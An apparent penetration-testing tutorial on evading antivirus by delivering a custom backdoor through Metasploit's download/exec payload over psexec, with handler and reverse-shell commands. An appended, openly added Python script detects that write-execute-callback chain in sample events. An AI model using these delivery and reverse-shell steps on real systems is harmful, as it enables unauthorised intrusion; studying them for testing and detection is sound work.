Why would we need custom payloads? Typically in situations where we launch a Metasploit exploit but no session is created, or it looks like the antivirus software caught the payload.
As a penetration tester, you have to overcome such hurdles, and antivirus software always seems to be one. The best way to avoid antivirus software is to use custom payloads.
Create your own custom payload and you won't have to worry about an antivirus signature catching it. It gives you the flexibility to go after any target.
Note: there are tools and articles to help you do this, including the Veil framework.
I'll cover Veil Framework in this custom payload series.
Let's begin... You've built your custom payload, so what's next? How do you make it operational, and how do you deliver and execute it on the victim's machine?
Start with the Download/Exec payload available in Metasploit. It's a tremendous option for delivering a custom payload to a target. You can use it with memory corruption exploits such as buffer overflows, and with authenticated attacks like PSEXEC. This Metasploit payload lets you use your custom payload together with Meterpreter.
You need three things for the usage of Download/Exec payload:
- Set up a website from which the victim can download your custom Trojan/backdoor.
- Set up a Metasploit handler to receive the connection from your custom backdoor.
- Create an exploit to deliver your custom payload.
Let’s take a look at the steps:
1 - Provide the “Download” for the Download/Exec payload
Setting up the website is quick and easy. I use Python. Change into the directory that contains the files you want to make available for download, then start the Python web server there. The files in that directory can then be downloaded using any web browser. You can set up this server on any computer that has Python installed.
2 - Set up the Metasploit handler to receive your connection
Start multi/handler and configure the parameters. Set your payload to one that is compatible with the custom payload you created. If your payload contains Meterpreter, you'll type:
“set payload windows/meterpreter/reverse_tcp”
If it is a command prompt then you would type
“set payload windows/shell/reverse_tcp”
My Python backdoor sends a command prompt, so I'll use:
“windows/shell/reverse_tcp”
This “single” payload doesn't use a stager and expects a connection from a shell. Do not confuse this with “windows/shell_reverse_tcp”, which expects a connection from a stager, not a shell. For a better understanding, check my write-ups on:
https://www.cybrary.it/0p3n/metasploit-advanced/
https://www.cybrary.it/0p3n/metasploit-advanced-part-ii/
https://www.cybrary.it/0p3n/metasploit-advanced-part-iii/
Let's continue... Set lhost to 127.0.0.1 and set lport to 80, as my payload is set to send a command prompt to port 80. Start the multi-handler as a background task: the “-j” option starts the multi-handler as a “job” that runs in the background.
3 - Exploit and deliver the payload
With your handler in the background waiting to receive a connection, you’re ready to exploit the target. I’ll use PSEXEC.
Initially, I use “windows/smb/psexec” and set it up with the correct user and password for the target. Then I set my payload: “set PAYLOAD download/exec”. The options are simple. Set the URL to point to the custom payload on your web server from step 1. You can change the name of the file that will be saved on the target if you like.
Finally, type “exploit” and you'll see it download from your website. A shell will appear in your handler.
Please note: for those who want a greater understanding of PSEXEC, I'll cover it in my next write-up.
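From the defender's side, the chain this procedure leaves on the target (an executable written to disk, run within seconds, then making an outbound connection on the handler's port) is what endpoint telemetry can correlate. The script below is an added example, not code from this post, and runs over constructed Sysmon-like events with hypothetical hosts and paths:

```python
from collections import defaultdict

# Constructed sample events in a simplified Sysmon-like shape (not real telemetry).
EVENTS = [
    # ws1: a service process writes an .exe, it runs and calls out to port 80 within seconds
    {"ts": 10, "type": "file_create", "host": "ws1", "proc": "C:\\Windows\\svc.exe",
     "path": "C:\\Users\\Public\\update.exe"},
    {"ts": 12, "type": "proc_create", "host": "ws1", "image": "C:\\Users\\Public\\update.exe",
     "parent": "C:\\Windows\\svc.exe"},
    {"ts": 13, "type": "net_connect", "host": "ws1", "image": "C:\\Users\\Public\\update.exe",
     "dst": "203.0.113.5", "dport": 80},
    # ws2: benign, a browser download run by the user an hour later with no callback
    {"ts": 20, "type": "file_create", "host": "ws2", "proc": "C:\\Program Files\\Firefox\\firefox.exe",
     "path": "C:\\Users\\bob\\Downloads\\setup.exe"},
    {"ts": 3800, "type": "proc_create", "host": "ws2", "image": "C:\\Users\\bob\\Downloads\\setup.exe",
     "parent": "C:\\Windows\\explorer.exe"},
]

WINDOW = 60  # seconds allowed between the file write and both the execution and the callback


def find_download_exec_chains(events, window=WINDOW):
    """Return one record per (host, path) where an .exe was written, executed,
    and made an outbound connection, all within `window` seconds of the write."""
    by_key = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        path = (e.get("path") or e.get("image", "")).lower()
        by_key[(e["host"], path)].append(e)
    hits = []
    for (host, path), evs in by_key.items():
        if not path.endswith(".exe"):
            continue
        writes = [e for e in evs if e["type"] == "file_create"]
        runs = [e for e in evs if e["type"] == "proc_create"]
        conns = [e for e in evs if e["type"] == "net_connect"]
        for w in writes:
            ran = [r for r in runs if 0 <= r["ts"] - w["ts"] <= window]
            called = [c for c in conns if 0 <= c["ts"] - w["ts"] <= window]
            if ran and called:
                hits.append({"host": host, "path": path, "writer": w["proc"],
                             "dst": f"{called[0]['dst']}:{called[0]['dport']}"})
    return hits


if __name__ == "__main__":
    for hit in find_download_exec_chains(EVENTS):
        print(f"{hit['host']}: {hit['writer']} wrote {hit['path']}, which ran and connected to {hit['dst']}")
```

The window and the .exe filter are tuning knobs; in practice you would also exclude known installers and browsers as the writing process.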
Stay Linked!!!
Ali Tabish